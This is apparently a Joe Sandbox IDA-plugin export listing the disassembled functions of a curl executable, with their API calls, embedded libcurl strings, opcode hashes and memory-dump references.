Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintfstrchr$_getchcurl_mvsnprintffputcfputsmemcpyreallocstrlen
String ID: ;$Enter %s password for user '%s':
API String ID: 259365684-2113148522
Opcode ID: 1ba5fe7b271dffd451cb36a9ec134884a27058fe6df905c1bf9c3e458b720fde
Instruction ID: 50648996a60c72a676d71b0957b9f1e0521671415b50652452e5fde6ea0e844e
Opcode Fuzzy Hash: 1ba5fe7b271dffd451cb36a9ec134884a27058fe6df905c1bf9c3e458b720fde
Instruction Fuzzy Hash: 515145B16087059FD310DF69C48525BFBE5FFC8348F15892EE8C887281E7799949CB82

Function 00440510 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 131stringCOMMON

Download Yara Rule

APIs

curl_msnprintf.CURL(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00433DE1), ref: 004405C8

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

memcpy.MSVCRT ref: 004405EE
strlen.MSVCRT ref: 004405F6
memcpy.MSVCRT ref: 00440614

Strings

operation aborted by callback, xrefs: 0044067A
read function returned funny value, xrefs: 0044065A
, xrefs: 004406B2
%x%s, xrefs: 004405B4
Read callback asked for PAUSE when not supported!, xrefs: 004406D8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcpy$curl_msnprintfcurl_mvsnprintfstrlen
String ID: $%x%s$Read callback asked for PAUSE when not supported!$operation aborted by callback$read function returned funny value
API String ID: 623653560-4239845467
Opcode ID: e95ecc42f29de5fa807f135d74bbd9f12aa7999a05476cbb733b73e87d287d9d
Instruction ID: 5d8b96e36ab8c99fef7db3e056a8e7d906db5d7b6eb439e1c80c2a6e754bb05d
Opcode Fuzzy Hash: e95ecc42f29de5fa807f135d74bbd9f12aa7999a05476cbb733b73e87d287d9d
Instruction Fuzzy Hash: 165149B16087008FD710DF29D48479ABBE0EFC4354F16887EE98C8B316E7799855CB96

Function 00427790 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 119stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 004277C2
isspace.MSVCRT ref: 004277F2
strchr.MSVCRT ref: 004278B1

Strings

%s, xrefs: 0042787D
;, xrefs: 004278A6
Host:, xrefs: 00427812
Content-Length, xrefs: 00427901
Connection, xrefs: 00427863
Content-Type:, xrefs: 00427924

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchr$isspace
String ID: %s$;$Connection$Content-Length$Content-Type:$Host:
API String ID: 556700956-2248959170
Opcode ID: 3a6e7827c4f81f85ca0d2d23bd5d2f602441328b59b8336b06bc4305bc7e6a1a
Instruction ID: 0c3d6d6099871147991f7facb9e979d2d7b67ac41d449d60916f99ee8aadf117
Opcode Fuzzy Hash: 3a6e7827c4f81f85ca0d2d23bd5d2f602441328b59b8336b06bc4305bc7e6a1a
Instruction Fuzzy Hash: 75415B70B0D361DBD710AF25D44862BFBE4AF80384F95885EE8C49B312E779E841DB5A

Function 004074C0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81fileCOMMON

Download Yara Rule

APIs

curl_mvsnprintf.CURL ref: 0040750B
fwrite.MSVCRT ref: 00407541
isspace.MSVCRT ref: 00407566
fwrite.MSVCRT ref: 00407590
fputc.MSVCRT ref: 004075A6
fputs.MSVCRT ref: 004075C5

Strings

F, xrefs: 004075F0
Warning: , xrefs: 00407536
F, xrefs: 00407546

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fwrite$curl_mvsnprintffputcfputsisspace
String ID: F$F$Warning:
API String ID: 3661744501-782175711
Opcode ID: db0b531b8a22e4eb1a91d3a09e6ab41c187502cd3f9655668d54b55bec125d18
Instruction ID: fa3c7e80d53b94e12265564076f3ee6593b42c2a04f2bb8301692195ee9d30ca
Opcode Fuzzy Hash: db0b531b8a22e4eb1a91d3a09e6ab41c187502cd3f9655668d54b55bec125d18
Instruction Fuzzy Hash: 5F312DB1908345AFC710DF25D9807AEBBE4AB85354F00882EE99C87391E33DA5498B97

Function 00404AA9 Relevance: 15.1, APIs: 10, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040621A
strpbrk.MSVCRT ref: 0040623B
malloc.MSVCRT ref: 0040624E
strcspn.MSVCRT ref: 00406292
strncpy.MSVCRT ref: 004062A8
isalpha.MSVCRT ref: 00406334

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: isalphamallocstrcspnstrlenstrncpystrpbrk
String ID:
API String ID: 1152108592-0
Opcode ID: 8f73f5a7cf62740b7198163e8aa0680252ed6e41d609722430e849576e1c6af0
Instruction ID: 3c8a20772e9a733a97682295d729a2ddf95d1a2ea98a2226a19054be4f896146
Opcode Fuzzy Hash: 8f73f5a7cf62740b7198163e8aa0680252ed6e41d609722430e849576e1c6af0
Instruction Fuzzy Hash: FD51B570A0C395CFC7209F69844076ABBE1AF86304F46087FD8C9AB342E778D8559B5A

Function 00443440 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 149stringCOMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 0044355B
strlen.MSVCRT ref: 00443581
strlen.MSVCRT ref: 00443643

Strings

%c%c==, xrefs: 0044360A
%c%c%c%c, xrefs: 004435B0
%c%c%c=, xrefs: 00443525

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$curl_msnprintf
String ID: %c%c%c%c$%c%c%c=$%c%c==
API String ID: 1122630748-3943651191
Opcode ID: 6d9f49ed12eaa0707995dc6055fe6b29eb1450481456caa04d5567452d09cb0f
Instruction ID: e50f7293e2fd76ace773d82e37f3967f32428a772904f3a4f8144b4e68b0d96f
Opcode Fuzzy Hash: 6d9f49ed12eaa0707995dc6055fe6b29eb1450481456caa04d5567452d09cb0f
Instruction Fuzzy Hash: 925160B19087509FE311DF29C48036BBBE0AF89705F0949AEE8D897351E338DA49CF56

Function 0040E520 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 140stringCOMMON

Download Yara Rule

APIs

curl_mprintf.CURL ref: 0040E592
curl_mprintf.CURL ref: 0040E5E5
_strdup.MSVCRT ref: 0040E620
strlen.MSVCRT ref: 0040E64C
curl_msnprintf.CURL ref: 0040E670
curl_msnprintf.CURL ref: 0040E6A2

Strings

%0*ld, xrefs: 0040E68E
internal error: invalid pattern type (%d), xrefs: 0040E58B, 0040E5DE

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mprintfcurl_msnprintf$_strdupstrlen
String ID: %0*ld$internal error: invalid pattern type (%d)
API String ID: 440551664-4294015770
Opcode ID: 6d5479126c5ccb2abf7c59c117520a6e0728a8e0c168b6ed0aae7dfeecc93be9
Instruction ID: 83aecabb56a63fc29f229b1bf1ec61a8a5a55b933994271bfe6258074e07fb30
Opcode Fuzzy Hash: 6d5479126c5ccb2abf7c59c117520a6e0728a8e0c168b6ed0aae7dfeecc93be9
Instruction Fuzzy Hash: 625192715093028FC710DF6AC48862ABBE1FF85304F198D7EE8899B352D339E855CB66

Function 00410F60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

curl_multi_setopt.CURL ref: 00410FB8
curl_multi_add_handle.CURL ref: 00410FC4
curl_multi_wait.CURL ref: 0041100C
curl_multi_perform.CURL ref: 00411037
curl_multi_info_read.CURL ref: 00411057
curl_multi_remove_handle.CURL ref: 0041106A

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

Strings

easy handled already used in multi handle, xrefs: 00410F7B

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_multi_add_handlecurl_multi_info_readcurl_multi_performcurl_multi_remove_handlecurl_multi_setoptcurl_multi_waitcurl_mvsnprintfstrlen
String ID: easy handled already used in multi handle
API String ID: 1903369336-1906748315
Opcode ID: 2d6792e96477745179e773fdb4fd4bb78d54f432078b5cb4376445b97ee2ddb0
Instruction ID: 737496693584e3a50800f3f24eaba95e3543c441883ee466e6253bf90b5ab09c
Opcode Fuzzy Hash: 2d6792e96477745179e773fdb4fd4bb78d54f432078b5cb4376445b97ee2ddb0
Instruction Fuzzy Hash: 08412070A093409FD3109F25C58179FBBE4BF88748F15892EF98887351E778D9C28B8A

Function 00423D60 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 122COMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 00423DE1

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

curl_msnprintf.CURL ref: 00423E9B
curl_msnprintf.CURL ref: 00423F0D

Strings

<, xrefs: 00423E26
%3I64dd %02I64dh, xrefs: 00423EEE
%2I64d:%02I64d:%02I64d, xrefs: 00423E5A
-:--, xrefs: 00423E05
%7I64dd, xrefs: 00423DCE

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintf$curl_mvsnprintf
String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd$-:--$<
API String ID: 405648482-865517028
Opcode ID: 87503ae9c989ea60e66fb74e60821f83d21ae67d8fd0420093933f57e1af6c93
Instruction ID: c3a685534966ef2dc24bfaa92ef8a536eb725b70243fbddc03cfa6f1cef18cc2
Opcode Fuzzy Hash: 87503ae9c989ea60e66fb74e60821f83d21ae67d8fd0420093933f57e1af6c93
Instruction Fuzzy Hash: C84128B1A083109FD704DF2AD58531EFBE5ABC4718F14C92EE49897361D37889448F87

Function 0040D110 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 102COMMON

Download Yara Rule

APIs

curl_easy_setopt.CURL ref: 0040D13D
curl_msnprintf.CURL ref: 0040D187
curl_msnprintf.CURL ref: 0040D228

Part of subcall function 00403420: curl_mvaprintf.CURL ref: 00403433
Part of subcall function 00403420: curl_free.CURL ref: 0040345A

Strings

%*s, xrefs: 0040D215
%s(long)%s%s, xrefs: 0040D1BF, 0040D277
%s%ldL);, xrefs: 0040D242
P, xrefs: 0040D21D
curl_easy_setopt(hnd, %s, , xrefs: 0040D170

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintf$curl_easy_setoptcurl_freecurl_mvaprintf
String ID: %*s$%s%ldL);$%s(long)%s%s$P$curl_easy_setopt(hnd, %s,
API String ID: 4162816667-1641863380
Opcode ID: db556ba136f66cdc7f1dcd94e1daa06620b2576186b7ee2b2cf6ec177ca1dc88
Instruction ID: 1b0886289607327feabe00b74cd315c6a52e68f38dddc2946cc5bda6b197fde1
Opcode Fuzzy Hash: db556ba136f66cdc7f1dcd94e1daa06620b2576186b7ee2b2cf6ec177ca1dc88
Instruction Fuzzy Hash: 03415A70A087029BD714DF65C84169BFBE4EFC0348F14C92EE4989B359EB7CD8498B86

Function 0040D2A0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 102COMMON

Download Yara Rule

APIs

curl_easy_setopt.CURL ref: 0040D2CD
curl_msnprintf.CURL ref: 0040D317
curl_msnprintf.CURL ref: 0040D3B8

Part of subcall function 00403420: curl_mvaprintf.CURL ref: 00403433
Part of subcall function 00403420: curl_free.CURL ref: 0040345A

Strings

%s%luUL);, xrefs: 0040D3D2
P, xrefs: 0040D3AD
%*s, xrefs: 0040D3A5
%s(long)%s%s, xrefs: 0040D34F, 0040D407
curl_easy_setopt(hnd, %s, , xrefs: 0040D300

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintf$curl_easy_setoptcurl_freecurl_mvaprintf
String ID: %*s$%s%luUL);$%s(long)%s%s$P$curl_easy_setopt(hnd, %s,
API String ID: 4162816667-3744857663
Opcode ID: 8abb7977d7bba41773275f1c4eb13d6c87a8bcf6348dd3fa6f21550f6c606643
Instruction ID: 7f4c784345187e1e2868f1f30ff1e87c21df5532d05246008958173ddfaf5b7f
Opcode Fuzzy Hash: 8abb7977d7bba41773275f1c4eb13d6c87a8bcf6348dd3fa6f21550f6c606643
Instruction Fuzzy Hash: 36415B70A087018BD714DF59C8412ABFBE4EFC0348F15C92EE8989B355E778D8498B4A

Function 0040D720 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 88COMMON

Download Yara Rule

APIs

curl_easy_setopt.CURL ref: 0040D73D
free.MSVCRT ref: 0040D814
free.MSVCRT ref: 0040D857

Strings

struct curl_slist *slist%d;, xrefs: 0040D767
curl_slist_free_all(slist%d);, xrefs: 0040D7AC
slist%d = NULL;, xrefs: 0040D790, 0040D7C8
slist%d = curl_slist_append(slist%d, "%s");, xrefs: 0040D7F2
curl_easy_setopt(hnd, %s, slist%d);, xrefs: 0040D838

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: free$curl_easy_setopt
String ID: curl_easy_setopt(hnd, %s, slist%d);$curl_slist_free_all(slist%d);$slist%d = NULL;$slist%d = curl_slist_append(slist%d, "%s");$struct curl_slist *slist%d;
API String ID: 2644175648-2550099798
Opcode ID: b06b461c8bc5c8d27c356387442cc229d98b4b7c9f1c841e1656e1db0d48c8d1
Instruction ID: 78633c427fc6958ec5b0b9d9c5d1610fbc9d0427089baa3a083c5d8c9b61d824
Opcode Fuzzy Hash: b06b461c8bc5c8d27c356387442cc229d98b4b7c9f1c841e1656e1db0d48c8d1
Instruction Fuzzy Hash: FF31F9709097029BC710AF5AC58065FFBE4EF94344F41C82FE8989B355E7B89885CB4B

Function 004139DC Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68stringwindowCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00413941
strrchr.MSVCRT ref: 00413961
GetLastError.KERNEL32 ref: 00413975
SetLastError.KERNEL32 ref: 00413981
strncpy.MSVCRT ref: 00413AF6
FormatMessageA.KERNEL32 ref: 00413B3C
curl_msnprintf.CURL ref: 00413B68

Strings

Unknown error %d (%#x), xrefs: 00413B55
Invalid arguments, xrefs: 00413A18

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLaststrrchr$FormatMessagecurl_msnprintfstrncpy
String ID: Invalid arguments$Unknown error %d (%#x)
API String ID: 2429537396-2493371213
Opcode ID: db7885690293f690317388d642ee127d32aa7faaf9c3e5f473a2ccd93ecd92eb
Instruction ID: 38f2d976478cd9428e66758889e203d55c39b037cd2f90775151df17299269ec
Opcode Fuzzy Hash: db7885690293f690317388d642ee127d32aa7faaf9c3e5f473a2ccd93ecd92eb
Instruction Fuzzy Hash: 4F2131B19083418AD710AF2CD5583AEBAE0AF80745F04843FE4D897396D7BDC9888F96

Function 00413A5C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65stringwindowCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00413941
strrchr.MSVCRT ref: 00413961
GetLastError.KERNEL32 ref: 00413975
SetLastError.KERNEL32 ref: 00413981
strncpy.MSVCRT ref: 00413AF6
FormatMessageA.KERNEL32 ref: 00413B3C
curl_msnprintf.CURL ref: 00413B68

Strings

Unknown error %d (%#x), xrefs: 00413B55
Winsock library is not ready, xrefs: 00413A88

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLaststrrchr$FormatMessagecurl_msnprintfstrncpy
String ID: Unknown error %d (%#x)$Winsock library is not ready
API String ID: 2429537396-380612735
Opcode ID: c2a7242f6085322c03fec20f8e840c610441efd37c9d5ed94423afbeb045196c
Instruction ID: a65941b353c847de34c0be100b580ccc6ef5d9ffe1f7f2c2fcc3e06b2011ae2a
Opcode Fuzzy Hash: c2a7242f6085322c03fec20f8e840c610441efd37c9d5ed94423afbeb045196c
Instruction Fuzzy Hash: F8213EB09087418AD710AF29C5583AEBBE0AF80345F00857EE49997296D7BDC9898B96

Function 0043FF10 Relevance: 13.7, APIs: 4, Strings: 5, Instructions: 164stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0043FF1E
strchr.MSVCRT ref: 0043FF61
strlen.MSVCRT ref: 0043FFC9
memcpy.MSVCRT ref: 0043FFDC

Strings

/.., xrefs: 00440062
/./, xrefs: 0043FFF8
?, xrefs: 0043FF56
../, xrefs: 0043FF80
/../, xrefs: 00440024

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

